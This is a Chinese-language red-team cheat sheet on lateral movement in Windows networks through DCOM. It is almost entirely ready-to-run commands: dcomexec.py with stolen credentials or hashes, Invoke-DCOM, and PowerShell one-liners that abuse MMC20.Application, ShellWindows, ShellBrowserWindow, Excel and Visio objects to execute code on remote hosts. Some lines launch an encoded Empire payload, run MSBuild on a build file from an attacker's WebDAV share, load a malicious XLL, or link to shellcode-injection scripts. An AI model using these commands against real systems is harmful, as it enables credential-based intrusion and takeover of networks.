跳转至

内网 - DCOM

DCOM 是 COM(组件对象模型)的扩展,允许应用程序实例化和访问远程计算机上 COM 对象的属性和方法。

dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...]
dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>'
dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>' 'ipconfig'

python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe'
# -object MMC20 指定我们要实例化 MMC20.Application 对象。
# -silentcommand 在不尝试获取输出的情况下执行命令。

# https://klezvirus.github.io/RedTeaming/LateralMovement/LateralMovementDCOM/
-t, --target=VALUE         目标机器
-b, --binary=VALUE         二进制文件powershell.exe
-a, --args=VALUE           参数-enc <blah>
-m, --method=VALUE         方法MMC20Application, ShellWindows,
                            ShellBrowserWindow, ExcelDDE, VisioAddonEx,
                            OutlookShellEx, ExcelXLL, VisioExecLine, 
                            OfficeMacro
-r, --reg, --registry      启用注册表操作
-h, -?, --help             显示帮助

当前方法MMC20.Application, ShellWindows, ShellBrowserWindow, ExcelDDE, VisioAddonEx, OutlookShellEx, ExcelXLL, VisioExecLine, OfficeMacro.

Import-Module .\Invoke-DCOM.ps1
Invoke-DCOM -ComputerName '10.10.10.10' -Method MMC20.Application -Command "calc.exe"
Invoke-DCOM -ComputerName '10.10.10.10' -Method ExcelDDE -Command "calc.exe"
Invoke-DCOM -ComputerName '10.10.10.10' -Method ServiceStart "MyService"
Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellBrowserWindow -Command "calc.exe"
Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellWindows -Command "calc.exe"

通过 MMC Application Class 使用 DCOM

此 COM 对象(MMC20.Application)允许你编写 MMC 管理单元操作的脚本组件。在 Document.ActiveView 下有一个名为 "ExecuteShellCommand" 的方法。

PS C:\> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1"))
PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,7)
PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",$null,"-enc DFDFSFSFSFSFSFSFSDFSFSF <Empire encoded string> ","7")

# 使用 MSBuild 的武器化示例
PS C:\> [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",$null,"\\10.10.10.2\webdav\build.xml","7")

n0tty/powershellery/Invoke-MMC20RCE.ps1

通过 Office 使用 DCOM

  • Excel.Application
    • DDEInitiate
    • RegisterXLL
  • Outlook.Application
    • CreateObject->Shell.Application->ShellExecute
    • CreateObject->ScriptControl(仅 office-32bit)
  • Visio.InvisibleApp(与 Visio.Application 相同,但不应显示 Visio 窗口)
    • Addons
    • ExecuteLine
  • Word.Application
    • RunAutoMacro
# 通过 DCOM 的 ExecuteExcel4Macro 将 shellcode 注入 excel.exe 的 Powershell 脚本
Invoke-Excel4DCOM64.ps1 https://gist.github.com/Philts/85d0f2f0a1cc901d40bbb5b44eb3b4c9
Invoke-ExShellcode.ps1 https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a

# 使用 Excel DDE
PS C:\> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
PS C:\> $excel.DisplayAlerts = $false
PS C:\> $excel.DDEInitiate("cmd", "/c calc.exe")

# 使用 Excel RegisterXLL
# 无法可靠地用于远程目标
需要reg add HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations /v AllowsNetworkLocations /t REG_DWORD /d 1
PS> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
PS> $excel.RegisterXLL("EvilXLL.dll")

# 使用 Visio
$visio = [activator]::CreateInstance([type]::GetTypeFromProgID("Visio.InvisibleApp", "$ComputerName"))
$visio.Addons.Add("C:\Windows\System32\cmd.exe").Run("/c calc")

通过 ShellExecute 使用 DCOM

$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"10.10.10.1")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)

通过 ShellBrowserWindow 使用 DCOM

⚠ 仅限 Windows 10,该对象在 Windows 7 中不存在

$com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"10.10.10.1")
$obj = [System.Activator]::CreateInstance($com)
$obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)

参考资料